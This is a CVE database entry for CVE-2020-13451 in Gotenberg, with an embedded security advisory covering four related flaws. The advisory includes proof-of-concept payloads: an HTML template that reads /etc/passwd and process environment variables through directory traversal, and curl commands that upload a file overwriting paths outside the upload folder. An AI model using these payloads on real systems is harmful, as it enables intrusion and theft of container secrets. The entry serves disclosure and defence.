CVE-2020-13451

2021-01-07T22:15:00

Description

An incomplete-cleanup vulnerability in the Office rendering engine of Gotenberg through 6.2.1 allows an attacker to overwrite LibreOffice configuration files and execute arbitrary code via macros.

Affected Software

CPE Name	Name	Version
thecodingmachine:gotenberg	thecodingmachine gotenberg	6.2.1

{"id": "CVE-2020-13451", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-13451", "description": "An incomplete-cleanup vulnerability in the Office rendering engine of Gotenberg through 6.2.1 allows an attacker to overwrite LibreOffice configuration files and execute arbitrary code via macros.", "published": "2021-01-07T22:15:00", "modified": "2021-01-08T18:57:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13451", "reporter": "cve@mitre.org", "references": ["https://github.com/thecodingmachine/gotenberg/issues/199", "http://packetstormsecurity.com/files/160744/Gotenberg-6.2.0-Traversal-Code-Execution-Insecure-Permissions.html"], "cvelist": ["CVE-2020-13451"], "immutableFields": [], "lastseen": "2022-03-23T12:49:01", "viewCount": 21, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:160744"]}], "rev": 4}, "score": {"value": 6.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:160744"]}]}, "exploitation": null, "vulnersScore": 6.5}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:thecodingmachine:gotenberg:6.2.1"], "cpe23": ["cpe:2.3:a:thecodingmachine:gotenberg:6.2.1:*:*:*:*:*:*:*"], "cwe": ["CWE-459"], "affectedSoftware": [{"cpeName": "thecodingmachine:gotenberg", "version": "6.2.1", "operator": "le", "name": "thecodingmachine gotenberg"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:thecodingmachine:gotenberg:6.2.1:*:*:*:*:*:*:*", "versionEndIncluding": "6.2.1", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/thecodingmachine/gotenberg/issues/199", "name": "https://github.com/thecodingmachine/gotenberg/issues/199", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/160744/Gotenberg-6.2.0-Traversal-Code-Execution-Insecure-Permissions.html", "name": "http://packetstormsecurity.com/files/160744/Gotenberg-6.2.0-Traversal-Code-Execution-Insecure-Permissions.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}

{"packetstorm": [{"lastseen": "2021-01-04T16:12:35", "description": "", "published": "2021-01-04T00:00:00", "type": "packetstorm", "title": "Gotenberg 6.2.0 Traversal / Code Execution / Insecure Permissions", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-13449", "CVE-2020-13450", "CVE-2020-13451", "CVE-2020-13452"], "modified": "2021-01-04T00:00:00", "id": "PACKETSTORM:160744", "href": "https://packetstormsecurity.com/files/160744/Gotenberg-6.2.0-Traversal-Code-Execution-Insecure-Permissions.html", "sourceData": "` \n \n1 Multiple vulnerabilities in Gotenberg <= 6.2.0 \n\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550 \n \nMultiple vulnerabilities in Gotenberg (a Docker-powered stateless API \nfor converting HTML, Markdown and Office documents to PDF used as a \nmicroservice) version <=6.2.0 allow a remote unauthenticated attacker \nto execute any command within Docker container. \n \nCVSSv3.1 chained score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \nDisclosure summary: [https://sploit.tech/2020/12/29/Gotenberg.html] \n \nWrite-up: [https://blazej-adamczyk.medium.com/0-day-bug-breaks-multi-million-dollar-system-38c9e31b27e9] \n \nExploit code: [https://github.com/br0xpl/gotenberg_hack] \n \nVideo: [https://youtu.be/NAv8qovLtgI] \n \n \n1.1 Download tirectory traversal \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \n \nCVE: CVE-2020-13449 \n \nVendor: [https://www.thecodingmachine.com] \n \nProduct: Gotenberg ([https://github.com/thecodingmachine/gotenberg]) \n \nVersion: <=6.2.1 \n \nDescription: Directory traversal vulnerability in Markdown engine of \nGotenberg version 6.2.1 and lower allows unauthorized attacker to read \nany container files. \n \nPoC: \n1. Create index.html file: \n\u250c\u2500\u2500\u2500\u2500 \n\u2502 <!doctype html> \n\u2502 <html lang=\"en\"> \n\u2502 <head> \n\u2502 <meta charset=\"utf-8\"> \n\u2502 <title>My PDF</title> \n\u2502 </head> \n\u2502 <body> \n\u2502 <pre style=\"white-space: pre-wrap;\"> \n\u2502 Path: \n\u2502 {{ .DirPath }} \n\u2502 PASSWD: \n\u2502 {{ toHTML .DirPath \"../../../../etc/passwd\" }} \n\u2502 IP: \n\u2502 {{ toHTML .DirPath \"../../../../proc/net/fib_trie\" }} \n\u2502 TCP: \n\u2502 {{ toHTML .DirPath \"../../../../proc/net/tcp\" }} \n\u2502 env: \n\u2502 {{ toHTML .DirPath \"../../../../proc/self/environ\" }} \n\u2502 </pre> \n\u2502 </body> \n\u2502 </html> \n\u2514\u2500\u2500\u2500\u2500 \n2. Call markdown endpoint: \n\u250c\u2500\u2500\u2500\u2500 \n\u2502 $ curl 'http://$URL_GOTENBERG/convert/markdown' --form files=@index.html\\ \n\u2502 -o result.pdf --header 'Content-Type: multipart/form-data' \n\u2514\u2500\u2500\u2500\u2500 \n \n \n1.2 Upload directory traversal \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \n \nCVE: CVE-2020-13450 \n \nVendor: [https://www.thecodingmachine.com] \n \nProduct: Gotenberg ([https://github.com/thecodingmachine/gotenberg]) \n \nVersion: <=6.2.1 \n \nDescription: Directory traversal vulnerability in file upload function \nof Gotenberg version 6.2.1 and lower allows unauthorized attacker to \nupload and overwrite any writeable files outside the desired folder. \n \nThis can lead to DoS, change program behaviour or even to code \nexecution (see CVE-2020-13451). \n \nPoC: \n\u250c\u2500\u2500\u2500\u2500 \n\u2502 curl 'http://$URL_GOTENBERG/convert/markdown' --form files=@index.html \\ \n\u2502 --form \"files=@tini;filename=../../../tini\" -o res.pdf\\ \n\u2502 --header 'Content-Type: multipart/form-data' \n\u2514\u2500\u2500\u2500\u2500 \n \n \n1.3 Code exec vulnerability using incomplete cleanup vulnerability \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \n \nCVE: CVE-2020-13451 \n \nVendor: [https://www.thecodingmachine.com] \n \nProduct: Gotenberg ([https://github.com/thecodingmachine/gotenberg]) \n \nVersion: <=6.2.0 \n \nDescription: Incomplete cleanup vulnerability in Office rendering \nengine of Gotenberg version 6.2.1 and lower allows unauthorized \nattacker (using a different vulnerability like CVE-2020-13450) to \noverwrite libreoffice config (profile) files and execute arbitrary \ncode using macros. \n \nGotenberg creates libreoffice profile when office endpoint is called \nin tmp choosing a folder with a name based on random ephemeral port \nnumber chosen by kernel. What is most important after finishing \nrequest the profile folder is not removed. Thus using a file upload \nvulnerability like the one described in CVE-2020-13450 an attacker can \nmodify the profile preparing a macro which is going to be executed \nnext time the same random profile will be reused. \n \nAnalyzing kernel sources, in default kernel config, there will be \nabout 14115 different ports choosen at random. The hack requires to \nretry many times but works reliably. \n \nExploit code: [https://github.com/br0xpl/gotenberg_hack] \n \n \n1.4 Insecure permissions of main executable \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \n \nCVE: CVE-2020-13452 \n \nVendor: [https://www.thecodingmachine.com] \n \nProduct: Gotenberg ([https://github.com/thecodingmachine/gotenberg]) \n \nVersion: <=6.2.1 \n \nDescription: Insecure permissions of /tini (writeable by user \ngotenberg) file potentially allows an attacker to overwrite the file \nwhat can lead to Deny of Service or even code execution. \n \n \n2 Timeline \n\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550 \n \n\u2022 25.05.2020 - Reported an issue: \n[[https://github.com/thecodingmachine/gotenberg/issues/199]]. \n\u2022 04.06.2020 - Author confirms the issues and works on a fix. \n\u2022 05.06.2020 - Pull request \n[[https://github.com/thecodingmachine/gotenberg/pull/208]] created. \n\u2022 22.06.2020 - Fix merged to version 6.3.0. \n \n \n3 Credits \n\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550 \n \nAuthor: Blazej Adamczyk | [https://sploit.tech/] \n \nTeam: Efigo [https://efigo.pl/] \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160744/gotenberg620-traversalexec.txt"}]}

CVE-2020-13451

Description

Affected Software

Related